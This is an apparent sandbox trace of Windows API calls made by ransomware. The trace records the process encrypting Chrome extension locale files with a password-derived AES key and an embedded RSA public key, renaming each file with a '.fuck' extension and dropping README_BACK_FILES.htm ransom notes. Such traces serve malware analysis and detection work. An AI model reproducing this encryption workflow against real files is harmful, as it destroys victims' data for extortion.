(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0259.252] AreFileApisANSI () returned 1 [0259.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.252] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.253] GetFileType (hFile=0x5d64) returned 0x1 [0259.253] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.257] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.257] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.258] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.258] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.258] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.258] GetLastError () returned 0x0 [0259.258] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json")) returned 0x20 [0259.259] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0259.259] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.260] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.261] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.261] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.264] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.264] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.264] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.264] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c240) returned 1 [0259.264] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.264] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.264] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c338) returned 1 [0259.264] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c338, dwCertEncodingType=0x1, pInfo=0x2e280f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28120*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28128*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c400) returned 1 [0259.264] CryptEncrypt (in: hKey=0x2e7c400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.265] CryptEncrypt (in: hKey=0x2e7c400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c6f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c6f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.265] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6c6f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c6f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.266] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0259.267] CryptEncrypt (in: hKey=0x2e7c240, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0259.267] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0259.269] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2d, lpOverlapped=0x0) returned 1 [0259.269] CryptEncrypt (in: hKey=0x2e7c240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2d, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x30) returned 1 [0259.269] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x30, lpOverlapped=0x0) returned 1 [0259.269] CloseHandle (hObject=0x5d60) returned 1 [0259.269] CloseHandle (hObject=0x5d5c) returned 1 [0259.270] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), bFailIfExists=0) returned 1 [0259.273] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json", dwFileAttributes=0x0) returned 1 [0259.273] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.gsg")) returned 1 [0259.275] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.fuck")) returned 1 [0259.276] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.276] CryptDestroyKey (hKey=0x2e7c240) returned 1 [0259.276] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.276] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.276] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.276] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\readme_back_files.htm")) returned 0xffffffff [0259.276] AreFileApisANSI () returned 1 [0259.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.277] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.277] GetFileType (hFile=0x5d64) returned 0x1 [0259.278] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.279] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.279] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.281] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.281] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.281] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.281] GetLastError () returned 0x0 [0259.281] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json")) returned 0x20 [0259.285] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json", dwFileAttributes=0x80) returned 1 [0259.285] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.286] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.287] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.288] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.290] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.290] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.290] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.290] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c5c0) returned 1 [0259.290] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.290] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.290] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d080) returned 1 [0259.291] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d080, dwCertEncodingType=0x1, pInfo=0x2e27b40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27b70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27b78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c240) returned 1 [0259.291] CryptEncrypt (in: hKey=0x2e7c240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.291] CryptEncrypt (in: hKey=0x2e7c240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c228*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c228*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.291] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6c228*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c228*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.292] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x279, lpOverlapped=0x0) returned 1 [0259.294] CryptEncrypt (in: hKey=0x2e7c5c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x279, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x280) returned 1 [0259.294] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x280, lpOverlapped=0x0) returned 1 [0259.303] CloseHandle (hObject=0x5d5c) returned 1 [0259.303] CloseHandle (hObject=0x5d60) returned 1 [0259.303] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0259.306] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0259.306] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.gsg")) returned 1 [0259.307] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.fuck")) returned 1 [0259.310] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.310] CryptDestroyKey (hKey=0x2e7c5c0) returned 1 [0259.310] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.310] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.310] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.310] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0259.310] AreFileApisANSI () returned 1 [0259.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.310] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.311] GetFileType (hFile=0x5d64) returned 0x1 [0259.311] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.312] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.312] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.313] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.313] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.313] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.313] GetLastError () returned 0x0 [0259.313] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 